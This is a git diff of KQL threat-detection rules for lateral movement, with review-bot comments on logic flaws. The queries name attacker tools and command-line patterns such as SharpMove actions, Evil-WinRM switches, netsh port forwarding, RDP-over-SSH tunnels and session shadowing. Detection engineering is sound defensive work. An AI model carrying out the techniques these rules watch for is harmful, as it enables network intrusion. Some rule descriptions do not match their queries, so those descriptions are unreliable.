@@ -1,12 +1,12 @@ -// Title: Copy From Or To Admin Share Or Sysvol Folder -// Author: Florian Roth (Nextron Systems), oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Nasreddine Bencherchali -// Date: 2019-12-30 -// Level: medium -// Description: Detects a copy command or a copy utility execution to or from an Admin share or remote -// MITRE Tactic: Lateral Movement -// Tags: attack.lateral-movement, attack.collection, attack.exfiltration, attack.t1039, attack.t1048, attack.t1021.002 -// False Positives: -// - Administrative scripts - -DeviceProcessEvents +// Title: Copy From Or To Admin Share Or Sysvol Folder +// Author: Florian Roth (Nextron Systems), oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Nasreddine Bencherchali +// Date: 2019-12-30 +// Level: medium +// Description: Detects a copy command or a copy utility execution to or from an Admin share or remote +// MITRE Tactic: Lateral Movement +// Tags: attack.lateral-movement, attack.collection, attack.exfiltration, attack.t1039, attack.t1048, attack.t1021.002 +// False Positives: +// - Administrative scripts + +DeviceProcessEvents | where ((ProcessCommandLine contains "\\" and ProcessCommandLine contains "\\" and ProcessCommandLine contains "$") or ProcessCommandLine contains "\\Sysvol\\") and (((FolderPath endswith "\\robocopy.exe" or FolderPath endswith "\\xcopy.exe") or (ProcessVersionInfoOriginalFileName in~ ("robocopy.exe", "XCOPY.EXE"))) or (ProcessCommandLine contains "copy" and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe")) or ((ProcessCommandLine contains "copy-item" or ProcessCommandLine contains "copy " or ProcessCommandLine contains "cpi " or ProcessCommandLine contains " cp " or ProcessCommandLine contains "move " or ProcessCommandLine contains " move-item" or ProcessCommandLine contains " mi " or ProcessCommandLine contains " mv ") and ((FolderPath contains "\\powershell_ise.exe" or FolderPath contains 
"\\powershell.exe" or FolderPath contains "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("powershell_ise.exe", "PowerShell.EXE", "pwsh.dll"))))) \ No newline at end of file diff --git a/KQL/rules/Lateral Movement/hacktool_sharpmove_tool_execution.kql b/KQL/rules/Lateral Movement/hacktool_sharpmove_tool_execution.kql index 2374defc..d6473d29 100644 --- a/KQL/rules/Lateral Movement/hacktool_sharpmove_tool_execution.kql +++ b/KQL/rules/Lateral Movement/hacktool_sharpmove_tool_execution.kql 
@@ -1,10 +1,10 @@ -// Title: HackTool - SharpMove Tool Execution -// Author: Luca Di Bartolomeo (CrimpSec) -// Date: 2024-01-29 -// Level: high -// Description: Detects the execution of SharpMove, a .NET utility performing multiple tasks such as "Task Creation", "SCM" query, VBScript execution using WMI via its PE metadata and command line options. -// MITRE Tactic: Lateral Movement -// Tags: attack.lateral-movement, attack.t1021.002 - -DeviceProcessEvents +// Title: HackTool - SharpMove Tool Execution +// Author: Luca Di Bartolomeo (CrimpSec) +// Date: 2024-01-29 +// Level: high +// Description: Detects the execution of SharpMove, a .NET utility performing multiple tasks such as "Task Creation", "SCM" query, VBScript execution using WMI via its PE metadata and command line options. +// MITRE Tactic: Lateral Movement +// Tags: attack.lateral-movement, attack.t1021.002 + +DeviceProcessEvents | where (FolderPath endswith "\\SharpMove.exe" or ProcessVersionInfoOriginalFileName =~ "SharpMove.exe") or ((ProcessCommandLine contains "action=create" or ProcessCommandLine contains "action=dcom" or ProcessCommandLine contains "action=executevbs" or ProcessCommandLine contains "action=hijackdcom" or ProcessCommandLine contains "action=modschtask" or ProcessCommandLine contains "action=modsvc" or ProcessCommandLine contains "action=query" or ProcessCommandLine contains "action=scm" or ProcessCommandLine contains "action=startservice" or ProcessCommandLine contains "action=taskscheduler") and ProcessCommandLine contains "computername=") \ No newline at end of file diff --git a/KQL/rules/Lateral Movement/hacktool_winrm_access_via_evil_winrm.kql b/KQL/rules/Lateral Movement/hacktool_winrm_access_via_evil_winrm.kql index 338ee2a6..3d84e596 100644 --- a/KQL/rules/Lateral Movement/hacktool_winrm_access_via_evil_winrm.kql +++ b/KQL/rules/Lateral Movement/hacktool_winrm_access_via_evil_winrm.kql 
@@ -1,10 +1,10 @@ -// Title: HackTool - WinRM Access Via Evil-WinRM -// Author: frack113 -// Date: 2022-01-07 -// Level: medium -// Description: Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user. -// MITRE Tactic: Lateral Movement -// Tags: attack.lateral-movement, attack.t1021.006 - -DeviceProcessEvents +// Title: HackTool - WinRM Access Via Evil-WinRM +// Author: frack113 +// Date: 2022-01-07 +// Level: medium +// Description: Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user. +// MITRE Tactic: Lateral Movement +// Tags: attack.lateral-movement, attack.t1021.006 + +DeviceProcessEvents | where (ProcessCommandLine contains "-i " and ProcessCommandLine contains "-u " and ProcessCommandLine contains "-p ") and FolderPath endswith "\\ruby.exe" \ No newline at end of file diff --git a/KQL/rules/Lateral Movement/mmc_spawning_windows_shell.kql b/KQL/rules/Lateral Movement/mmc_spawning_windows_shell.kql index 27dfae8a..5d7b1685 100644 --- a/KQL/rules/Lateral Movement/mmc_spawning_windows_shell.kql +++ b/KQL/rules/Lateral Movement/mmc_spawning_windows_shell.kql 
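Review bot: The `// Description:` header talks about logging in over RDP with valid accounts, but the query matches `ruby.exe` launched with the `-i`, `-u` and `-p` switches, which is Evil-WinRM over WinRM (and the tag is attack.t1021.006); an analyst triaging the alert from the description alone would look at the wrong protocol. Suggested text: `// Description: Detects Evil-WinRM usage by matching ruby.exe started with the -i (target host), -u (user) and -p (password) switches, indicating a WinRM remote shell.` Since any Ruby script that takes `-i`/`-u`/`-p` also matches, a `// False Positives:` bullet for legitimate Ruby tooling would fit the medium level.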
@@ -1,10 +1,10 @@ -// Title: MMC Spawning Windows Shell -// Author: Karneades, Swisscom CSIRT -// Date: 2019-08-05 -// Level: high -// Description: Detects a Windows command line executable started from MMC -// MITRE Tactic: Lateral Movement -// Tags: attack.lateral-movement, attack.t1021.003 - -DeviceProcessEvents +// Title: MMC Spawning Windows Shell +// Author: Karneades, Swisscom CSIRT +// Date: 2019-08-05 +// Level: high +// Description: Detects a Windows command line executable started from MMC +// MITRE Tactic: Lateral Movement +// Tags: attack.lateral-movement, attack.t1021.003 + +DeviceProcessEvents | where InitiatingProcessFolderPath endswith "\\mmc.exe" and ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\regsvr32.exe") or FolderPath contains "\\BITSADMIN") \ No newline at end of file diff --git a/KQL/rules/Lateral Movement/mstsc_exe_execution_from_uncommon_parent.kql b/KQL/rules/Lateral Movement/mstsc_exe_execution_from_uncommon_parent.kql index 92aa7343..2f6bda36 100644 --- a/KQL/rules/Lateral Movement/mstsc_exe_execution_from_uncommon_parent.kql +++ b/KQL/rules/Lateral Movement/mstsc_exe_execution_from_uncommon_parent.kql 
@@ -1,12 +1,12 @@ -// Title: Mstsc.EXE Execution From Uncommon Parent -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-04-18 -// Level: high -// Description: Detects potential RDP connection via Mstsc using a local ".rdp" file located in suspicious locations. -// MITRE Tactic: Lateral Movement -// Tags: attack.lateral-movement -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Mstsc.EXE Execution From Uncommon Parent +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-04-18 +// Level: high +// Description: Detects potential RDP connection via Mstsc using a local ".rdp" file located in suspicious locations. +// MITRE Tactic: Lateral Movement +// Tags: attack.lateral-movement +// False Positives: +// - Unlikely + +DeviceProcessEvents | where (FolderPath endswith "\\mstsc.exe" or ProcessVersionInfoOriginalFileName =~ "mstsc.exe") and (InitiatingProcessFolderPath endswith "\\brave.exe" or InitiatingProcessFolderPath endswith "\\CCleanerBrowser.exe" or InitiatingProcessFolderPath endswith "\\chrome.exe" or InitiatingProcessFolderPath endswith "\\chromium.exe" or InitiatingProcessFolderPath endswith "\\firefox.exe" or InitiatingProcessFolderPath endswith "\\iexplore.exe" or InitiatingProcessFolderPath endswith "\\microsoftedge.exe" or InitiatingProcessFolderPath endswith "\\msedge.exe" or InitiatingProcessFolderPath endswith "\\opera.exe" or InitiatingProcessFolderPath endswith "\\vivaldi.exe" or InitiatingProcessFolderPath endswith "\\whale.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe") \ No newline at end of file diff --git a/KQL/rules/Lateral Movement/new_port_forwarding_rule_added_via_netsh_exe.kql b/KQL/rules/Lateral Movement/new_port_forwarding_rule_added_via_netsh_exe.kql index 8e079b84..60d05d82 100644 --- a/KQL/rules/Lateral Movement/new_port_forwarding_rule_added_via_netsh_exe.kql +++ b/KQL/rules/Lateral Movement/new_port_forwarding_rule_added_via_netsh_exe.kql 
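Review bot: The `// Description:` text refers to a local ".rdp" file in suspicious locations, but the query has no command-line or path condition at all — it keys solely on mstsc.exe whose parent is one of the listed browsers or outlook.exe. Suggested text: `// Description: Detects mstsc.exe started by a web browser or Outlook, an uncommon parent chain that can indicate a user opening an attacker-supplied .rdp file from a link or attachment.` The `// False Positives: Unlikely` line may be optimistic, since a user opening a legitimately downloaded .rdp file from the browser's download bar would presumably produce the same parent chain; worth noting if that is common in your environment.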
@@ -1,13 +1,13 @@ -// Title: New Port Forwarding Rule Added Via Netsh.EXE -// Author: Florian Roth (Nextron Systems), omkar72, oscd.community, Swachchhanda Shrawan Poudel -// Date: 2019-01-29 -// Level: medium -// Description: Detects the execution of netsh commands that configure a new port forwarding (PortProxy) rule -// MITRE Tactic: Lateral Movement -// Tags: attack.lateral-movement, attack.defense-evasion, attack.command-and-control, attack.t1090 -// False Positives: -// - Legitimate administration activity -// - WSL2 network bridge PowerShell script used for WSL/Kubernetes/Docker (e.g. https://github.com/microsoft/WSL/issues/4150#issuecomment-504209723) - -DeviceProcessEvents +// Title: New Port Forwarding Rule Added Via Netsh.EXE +// Author: Florian Roth (Nextron Systems), omkar72, oscd.community, Swachchhanda Shrawan Poudel +// Date: 2019-01-29 +// Level: medium +// Description: Detects the execution of netsh commands that configure a new port forwarding (PortProxy) rule +// MITRE Tactic: Lateral Movement +// Tags: attack.lateral-movement, attack.defense-evasion, attack.command-and-control, attack.t1090 +// False Positives: +// - Legitimate administration activity +// - WSL2 network bridge PowerShell script used for WSL/Kubernetes/Docker (e.g. https://github.com/microsoft/WSL/issues/4150#issuecomment-504209723) + +DeviceProcessEvents | where (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe") and ((ProcessCommandLine contains "interface" and ProcessCommandLine contains "portproxy" and ProcessCommandLine contains "add" and ProcessCommandLine contains "v4tov4") or (ProcessCommandLine contains "i " and ProcessCommandLine contains "p " and ProcessCommandLine contains "a " and ProcessCommandLine contains "v ") or (ProcessCommandLine contains "connectp" and ProcessCommandLine contains "listena" and ProcessCommandLine contains "c=")) \ No newline at end of file 
diff --git a/KQL/rules/Lateral Movement/new_portproxy_registry_entry_added.kql b/KQL/rules/Lateral Movement/new_portproxy_registry_entry_added.kql
index 0804f14d..0827a45a 100644
--- a/KQL/rules/Lateral Movement/new_portproxy_registry_entry_added.kql
+++ b/KQL/rules/Lateral Movement/new_portproxy_registry_entry_added.kql
@@ -1,13 +1,13 @@
-// Title: New PortProxy Registry Entry Added
-// Author: Andreas Hunkeler (@Karneades)
-// Date: 2021-06-22
-// Level: medium
-// Description: Detects the modification of the PortProxy registry key which is used for port forwarding.
-// MITRE Tactic: Lateral Movement
-// Tags: attack.lateral-movement, attack.defense-evasion, attack.command-and-control, attack.t1090
-// False Positives:
-// - WSL2 network bridge PowerShell script used for WSL/Kubernetes/Docker (e.g. https://github.com/microsoft/WSL/issues/4150#issuecomment-504209723)
-// - Synergy Software KVM (https://symless.com/synergy)
-
-DeviceRegistryEvents
+// Title: New PortProxy Registry Entry Added
+// Author: Andreas Hunkeler (@Karneades)
+// Date: 2021-06-22
+// Level: medium
+// Description: Detects the modification of the PortProxy registry key which is used for port forwarding.
+// MITRE Tactic: Lateral Movement
+// Tags: attack.lateral-movement, attack.defense-evasion, attack.command-and-control, attack.t1090
+// False Positives:
+// - WSL2 network bridge PowerShell script used for WSL/Kubernetes/Docker (e.g. https://github.com/microsoft/WSL/issues/4150#issuecomment-504209723)
+// - Synergy Software KVM (https://symless.com/synergy)
+
+DeviceRegistryEvents
 | where RegistryKey endswith "\\Services\\PortProxy\\v4tov4\\tcp*"
\ No newline at end of file
diff --git a/KQL/rules/Lateral Movement/new_remote_desktop_connection_initiated_via_mstsc_exe.kql b/KQL/rules/Lateral Movement/new_remote_desktop_connection_initiated_via_mstsc_exe.kql
index 4e94032f..2e236fde 100644
--- a/KQL/rules/Lateral Movement/new_remote_desktop_connection_initiated_via_mstsc_exe.kql
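Review bot: `RegistryKey endswith "\\Services\\PortProxy\\v4tov4\\tcp*"` carries a literal asterisk — KQL `endswith` has no wildcard semantics, so this only matches a key whose name literally ends in `tcp*`, which never occurs, and the rule is inert as written. Replace the context line with `| where RegistryKey contains "\\Services\\PortProxy\\v4tov4\\tcp"`, which matches the key the description names regardless of how the listener value beneath it is recorded. If your data carries distinct `ActionType` values for value-set versus key-deleted events, restricting to the set/create forms would keep removal of a forwarding rule from alerting under the same "entry added" title.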
+++ b/KQL/rules/Lateral Movement/new_remote_desktop_connection_initiated_via_mstsc_exe.kql @@ -1,13 +1,13 @@ -// Title: New Remote Desktop Connection Initiated Via Mstsc.EXE -// Author: frack113 -// Date: 2022-01-07 -// Level: medium -// Description: Detects the usage of "mstsc.exe" with the "/v" flag to initiate a connection to a remote server. -// Adversaries may use valid accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user. -// MITRE Tactic: Lateral Movement -// Tags: attack.lateral-movement, attack.t1021.001 -// False Positives: -// - WSL (Windows Sub System For Linux) - -DeviceProcessEvents +// Title: New Remote Desktop Connection Initiated Via Mstsc.EXE +// Author: frack113 +// Date: 2022-01-07 +// Level: medium +// Description: Detects the usage of "mstsc.exe" with the "/v" flag to initiate a connection to a remote server. +// Adversaries may use valid accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user. +// MITRE Tactic: Lateral Movement +// Tags: attack.lateral-movement, attack.t1021.001 +// False Positives: +// - WSL (Windows Sub System For Linux) + +DeviceProcessEvents | where ((ProcessCommandLine contains " -v:" or ProcessCommandLine contains " /v:" or ProcessCommandLine contains " –v:" or ProcessCommandLine contains " —v:" or ProcessCommandLine contains " ―v:") and (FolderPath endswith "\\mstsc.exe" or ProcessVersionInfoOriginalFileName =~ "mstsc.exe")) and (not((ProcessCommandLine contains "C:\\ProgramData\\Microsoft\\WSL\\wslg.rdp" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\lxss\\wslhost.exe"))) \ No newline at end of file diff --git a/KQL/rules/Lateral Movement/outbound_rdp_connections_over_non_standard_tools.kql b/KQL/rules/Lateral Movement/outbound_rdp_connections_over_non_standard_tools.kql index 5808e874..e9ce9edc 100644 
--- a/KQL/rules/Lateral Movement/outbound_rdp_connections_over_non_standard_tools.kql +++ b/KQL/rules/Lateral Movement/outbound_rdp_connections_over_non_standard_tools.kql 
@@ -1,13 +1,13 @@ -// Title: Outbound RDP Connections Over Non-Standard Tools -// Author: Markus Neis -// Date: 2019-05-15 -// Level: high -// Description: Detects Non-Standard tools initiating a connection over port 3389 indicating possible lateral movement. -// An initial baseline is required before using this utility to exclude third party RDP tooling that you might use. -// MITRE Tactic: Lateral Movement -// Tags: attack.lateral-movement, attack.t1021.001, car.2013-07-002 -// False Positives: -// - Third party RDP tools - -DeviceNetworkEvents +// Title: Outbound RDP Connections Over Non-Standard Tools +// Author: Markus Neis +// Date: 2019-05-15 +// Level: high +// Description: Detects Non-Standard tools initiating a connection over port 3389 indicating possible lateral movement. +// An initial baseline is required before using this utility to exclude third party RDP tooling that you might use. +// MITRE Tactic: Lateral Movement +// Tags: attack.lateral-movement, attack.t1021.001, car.2013-07-002 +// False Positives: +// - Third party RDP tools + +DeviceNetworkEvents | where RemotePort == 3389 and (not((InitiatingProcessFolderPath in~ ("C:\\Windows\\System32\\mstsc.exe", "C:\\Windows\\SysWOW64\\mstsc.exe")))) and (not(((InitiatingProcessFolderPath endswith "\\Avast Software\\Avast\\AvastSvc.exe" or InitiatingProcessFolderPath endswith "\\Avast\\AvastSvc.exe") or InitiatingProcessFolderPath =~ "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" or (InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\dns.exe" and Protocol =~ "udp" and LocalPort == 53) or InitiatingProcessFolderPath =~ "" or InitiatingProcessFolderPath =~ "C:\\Program Files\\Mozilla Firefox\\firefox.exe" or isnull(InitiatingProcessFolderPath) or InitiatingProcessFolderPath endswith "\\Ranger\\SentinelRanger.exe" or InitiatingProcessFolderPath startswith "C:\\Program Files\\SplunkUniversalForwarder\\bin\\" or InitiatingProcessFolderPath endswith "\\RDCMan.exe" or 
(InitiatingProcessFolderPath endswith "\\FSAssessment.exe" or InitiatingProcessFolderPath endswith "\\FSDiscovery.exe" or InitiatingProcessFolderPath endswith "\\MobaRTE.exe" or InitiatingProcessFolderPath endswith "\\mRemote.exe" or InitiatingProcessFolderPath endswith "\\mRemoteNG.exe" or InitiatingProcessFolderPath endswith "\\Passwordstate.exe" or InitiatingProcessFolderPath endswith "\\RemoteDesktopManager.exe" or InitiatingProcessFolderPath endswith "\\RemoteDesktopManager64.exe" or InitiatingProcessFolderPath endswith "\\RemoteDesktopManagerFree.exe" or InitiatingProcessFolderPath endswith "\\RSSensor.exe" or InitiatingProcessFolderPath endswith "\\RTS2App.exe" or InitiatingProcessFolderPath endswith "\\RTSApp.exe" or InitiatingProcessFolderPath endswith "\\spiceworks-finder.exe" or InitiatingProcessFolderPath endswith "\\Terminals.exe" or InitiatingProcessFolderPath endswith "\\ws_TunnelService.exe") or (InitiatingProcessFolderPath endswith "\\thor.exe" or InitiatingProcessFolderPath endswith "\\thor64.exe") or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\TSplus\\Java\\bin\\HTML5service.exe", "C:\\Program Files (x86)\\TSplus\\Java\\bin\\HTML5service.exe")) or InitiatingProcessFolderPath =~ ""))) \ No newline at end of file diff --git a/KQL/rules/Lateral Movement/potential_dcom_internetexplorer_application_dll_hijack.kql b/KQL/rules/Lateral Movement/potential_dcom_internetexplorer_application_dll_hijack.kql index 3ec120ed..1d16c985 100644 --- a/KQL/rules/Lateral Movement/potential_dcom_internetexplorer_application_dll_hijack.kql +++ b/KQL/rules/Lateral Movement/potential_dcom_internetexplorer_application_dll_hijack.kql 
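Review bot: The exclusion list tests `InitiatingProcessFolderPath =~ ""` twice — once beside the firefox.exe entry and again as the final term — and, together with `isnull(InitiatingProcessFolderPath)`, it discards every port-3389 connection that has no process attribution. Drop the duplicate term, and record the unattributed-connection gap as a `// False Positives:`-style bullet (e.g. `// - Connections with no initiating process are excluded; review DeviceNetworkEvents separately for those`) rather than leaving it as a silent filter in a high-severity rule. The hard-coded `C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe` and firefox.exe exclusions are also full-path matches, which is the right choice here — a browser copy in a user-writable path still alerts.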
@@ -1,10 +1,10 @@
-// Title: Potential DCOM InternetExplorer.Application DLL Hijack
-// Author: Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga
-// Date: 2020-10-12
-// Level: critical
-// Description: Detects potential DLL hijack of "iertutil.dll" found in the DCOM InternetExplorer.Application Class over the network
-// MITRE Tactic: Lateral Movement
-// Tags: attack.lateral-movement, attack.t1021.002, attack.t1021.003
-
-DeviceFileEvents
+// Title: Potential DCOM InternetExplorer.Application DLL Hijack
+// Author: Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga
+// Date: 2020-10-12
+// Level: critical
+// Description: Detects potential DLL hijack of "iertutil.dll" found in the DCOM InternetExplorer.Application Class over the network
+// MITRE Tactic: Lateral Movement
+// Tags: attack.lateral-movement, attack.t1021.002, attack.t1021.003
+
+DeviceFileEvents
 | where InitiatingProcessFolderPath =~ "System" and FolderPath endswith "\\Internet Explorer\\iertutil.dll"
\ No newline at end of file
diff --git a/KQL/rules/Lateral Movement/potential_dcom_internetexplorer_application_dll_hijack_image_load.kql b/KQL/rules/Lateral Movement/potential_dcom_internetexplorer_application_dll_hijack_image_load.kql
index 1a20a4ef..ab64fcea 100644
--- a/KQL/rules/Lateral Movement/potential_dcom_internetexplorer_application_dll_hijack_image_load.kql
+++ b/KQL/rules/Lateral Movement/potential_dcom_internetexplorer_application_dll_hijack_image_load.kql
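Review bot: The context line has no `ActionType` filter, so DeviceFileEvents rows for modification, rename and deletion of iertutil.dll all raise this critical alert, whereas the hijack the description targets is a file being written into the Internet Explorer directory; add `and ActionType in~ ("FileCreated", "FileModified")` (or just `FileCreated` if you only want the drop). `InitiatingProcessFolderPath =~ "System"` compares a folder-path column against a process name — the Sysmon original presumably used `Image: System` for kernel-originated SMB writes, and it is not evident from the hunk that MDE populates the folder path with that token; verify on a sample of remote writes and switch to `InitiatingProcessFileName =~ "System"` if that is the column that carries it.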
@@ -1,10 +1,10 @@ -// Title: Potential DCOM InternetExplorer.Application DLL Hijack - Image Load -// Author: Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga -// Date: 2020-10-12 -// Level: critical -// Description: Detects potential DLL hijack of "iertutil.dll" found in the DCOM InternetExplorer.Application Class -// MITRE Tactic: Lateral Movement -// Tags: attack.lateral-movement, attack.t1021.002, attack.t1021.003 - -DeviceImageLoadEvents +// Title: Potential DCOM InternetExplorer.Application DLL Hijack - Image Load +// Author: Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga +// Date: 2020-10-12 +// Level: critical +// Description: Detects potential DLL hijack of "iertutil.dll" found in the DCOM InternetExplorer.Application Class +// MITRE Tactic: Lateral Movement +// Tags: attack.lateral-movement, attack.t1021.002, attack.t1021.003 + +DeviceImageLoadEvents | where FolderPath endswith "\\Internet Explorer\\iertutil.dll" and InitiatingProcessFolderPath endswith "\\Internet Explorer\\iexplore.exe" \ No newline at end of file diff --git a/KQL/rules/Lateral Movement/potential_excel_exe_dcom_lateral_movement_via_activatemicrosoftapp.kql b/KQL/rules/Lateral Movement/potential_excel_exe_dcom_lateral_movement_via_activatemicrosoftapp.kql index e3c243d4..f21b7efb 100644 --- a/KQL/rules/Lateral Movement/potential_excel_exe_dcom_lateral_movement_via_activatemicrosoftapp.kql +++ b/KQL/rules/Lateral Movement/potential_excel_exe_dcom_lateral_movement_via_activatemicrosoftapp.kql 
@@ -1,10 +1,10 @@ -// Title: Potential Excel.EXE DCOM Lateral Movement Via ActivateMicrosoftApp -// Author: Aaron Stratton -// Date: 2023-11-13 -// Level: high -// Description: Detects suspicious child processes of Excel which could be an indicator of lateral movement leveraging the "ActivateMicrosoftApp" Excel DCOM object. -// MITRE Tactic: Lateral Movement -// Tags: attack.t1021.003, attack.lateral-movement - -DeviceProcessEvents +// Title: Potential Excel.EXE DCOM Lateral Movement Via ActivateMicrosoftApp +// Author: Aaron Stratton +// Date: 2023-11-13 +// Level: high +// Description: Detects suspicious child processes of Excel which could be an indicator of lateral movement leveraging the "ActivateMicrosoftApp" Excel DCOM object. +// MITRE Tactic: Lateral Movement +// Tags: attack.t1021.003, attack.lateral-movement + +DeviceProcessEvents | where ((ProcessVersionInfoOriginalFileName in~ ("foxprow.exe", "schdplus.exe", "winproj.exe")) or (FolderPath endswith "\\foxprow.exe" or FolderPath endswith "\\schdplus.exe" or FolderPath endswith "\\winproj.exe")) and InitiatingProcessFolderPath endswith "\\excel.exe" \ No newline at end of file diff --git a/KQL/rules/Lateral Movement/potential_lateral_movement_via_windows_remote_shell.kql b/KQL/rules/Lateral Movement/potential_lateral_movement_via_windows_remote_shell.kql index 13fef618..10d4e84c 100644 --- a/KQL/rules/Lateral Movement/potential_lateral_movement_via_windows_remote_shell.kql +++ b/KQL/rules/Lateral Movement/potential_lateral_movement_via_windows_remote_shell.kql 
@@ -1,12 +1,12 @@ -// Title: Potential Lateral Movement via Windows Remote Shell -// Author: Liran Ravich -// Date: 2025-10-22 -// Level: medium -// Description: Detects a child process spawned by 'winrshost.exe', which suggests remote command execution through Windows Remote Shell (WinRs) and may indicate potential lateral movement activity. -// MITRE Tactic: Lateral Movement -// Tags: attack.lateral-movement, attack.t1021.006 -// False Positives: -// - Legitimate use of WinRM within the organization - -DeviceProcessEvents +// Title: Potential Lateral Movement via Windows Remote Shell +// Author: Liran Ravich +// Date: 2025-10-22 +// Level: medium +// Description: Detects a child process spawned by 'winrshost.exe', which suggests remote command execution through Windows Remote Shell (WinRs) and may indicate potential lateral movement activity. +// MITRE Tactic: Lateral Movement +// Tags: attack.lateral-movement, attack.t1021.006 +// False Positives: +// - Legitimate use of WinRM within the organization + +DeviceProcessEvents | where InitiatingProcessFolderPath endswith "\\winrshost.exe" and (not(FolderPath =~ "C:\\Windows\\System32\\conhost.exe")) \ No newline at end of file diff --git a/KQL/rules/Lateral Movement/potential_mstsc_shadowing_activity.kql b/KQL/rules/Lateral Movement/potential_mstsc_shadowing_activity.kql index 86dc13f4..5712cb83 100644 --- a/KQL/rules/Lateral Movement/potential_mstsc_shadowing_activity.kql +++ b/KQL/rules/Lateral Movement/potential_mstsc_shadowing_activity.kql 
@@ -1,10 +1,10 @@ -// Title: Potential MSTSC Shadowing Activity -// Author: Florian Roth (Nextron Systems) -// Date: 2020-01-24 -// Level: high -// Description: Detects RDP session hijacking by using MSTSC shadowing -// MITRE Tactic: Lateral Movement -// Tags: attack.lateral-movement, attack.t1563.002 - -DeviceProcessEvents +// Title: Potential MSTSC Shadowing Activity +// Author: Florian Roth (Nextron Systems) +// Date: 2020-01-24 +// Level: high +// Description: Detects RDP session hijacking by using MSTSC shadowing +// MITRE Tactic: Lateral Movement +// Tags: attack.lateral-movement, attack.t1563.002 + +DeviceProcessEvents | where ProcessCommandLine contains "noconsentprompt" and ProcessCommandLine contains "shadow:" \ No newline at end of file diff --git a/KQL/rules/Lateral Movement/potential_remote_desktop_tunneling.kql b/KQL/rules/Lateral Movement/potential_remote_desktop_tunneling.kql index a709c271..a9e6a2a6 100644 --- a/KQL/rules/Lateral Movement/potential_remote_desktop_tunneling.kql +++ b/KQL/rules/Lateral Movement/potential_remote_desktop_tunneling.kql 
@@ -1,10 +1,10 @@ -// Title: Potential Remote Desktop Tunneling -// Author: Tim Rauch, Elastic (idea) -// Date: 2022-09-27 -// Level: medium -// Description: Detects potential use of an SSH utility to establish RDP over a reverse SSH Tunnel. This can be used by attackers to enable routing of network packets that would otherwise not reach their intended destination. -// MITRE Tactic: Lateral Movement -// Tags: attack.lateral-movement, attack.t1021 - -DeviceProcessEvents +// Title: Potential Remote Desktop Tunneling +// Author: Tim Rauch, Elastic (idea) +// Date: 2022-09-27 +// Level: medium +// Description: Detects potential use of an SSH utility to establish RDP over a reverse SSH Tunnel. This can be used by attackers to enable routing of network packets that would otherwise not reach their intended destination. +// MITRE Tactic: Lateral Movement +// Tags: attack.lateral-movement, attack.t1021 + +DeviceProcessEvents | where ProcessCommandLine contains ":3389" and (ProcessCommandLine contains " -L " or ProcessCommandLine contains " -P " or ProcessCommandLine contains " -R " or ProcessCommandLine contains " -pw " or ProcessCommandLine contains " -ssh ") \ No newline at end of file diff --git a/KQL/rules/Lateral Movement/privilege_escalation_via_named_pipe_impersonation.kql b/KQL/rules/Lateral Movement/privilege_escalation_via_named_pipe_impersonation.kql index 2af67c7b..1f5d0adf 100644 --- a/KQL/rules/Lateral Movement/privilege_escalation_via_named_pipe_impersonation.kql +++ b/KQL/rules/Lateral Movement/privilege_escalation_via_named_pipe_impersonation.kql 
@@ -1,12 +1,12 @@
-// Title: Privilege Escalation via Named Pipe Impersonation
-// Author: Tim Rauch, Elastic (idea)
-// Date: 2022-09-27
-// Level: high
-// Description: Detects a remote file copy attempt to a hidden network share. This may indicate lateral movement or data staging activity.
-// MITRE Tactic: Lateral Movement
-// Tags: attack.lateral-movement, attack.t1021
-// False Positives:
-// - Other programs that cause these patterns (please report)
-
-DeviceProcessEvents
+// Title: Privilege Escalation via Named Pipe Impersonation
+// Author: Tim Rauch, Elastic (idea)
+// Date: 2022-09-27
+// Level: high
+// Description: Detects a remote file copy attempt to a hidden network share. This may indicate lateral movement or data staging activity.
+// MITRE Tactic: Lateral Movement
+// Tags: attack.lateral-movement, attack.t1021
+// False Positives:
+// - Other programs that cause these patterns (please report)
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "echo" and ProcessCommandLine contains ">" and ProcessCommandLine contains "\\\\.\\pipe\\") and ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe") or (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "PowerShell.EXE")))
\ No newline at end of file
diff --git a/KQL/rules/Lateral Movement/psexec_remote_execution_file_artefact.kql b/KQL/rules/Lateral Movement/psexec_remote_execution_file_artefact.kql
index 02bac7ad..91e44e54 100644
--- a/KQL/rules/Lateral Movement/psexec_remote_execution_file_artefact.kql
+++ b/KQL/rules/Lateral Movement/psexec_remote_execution_file_artefact.kql
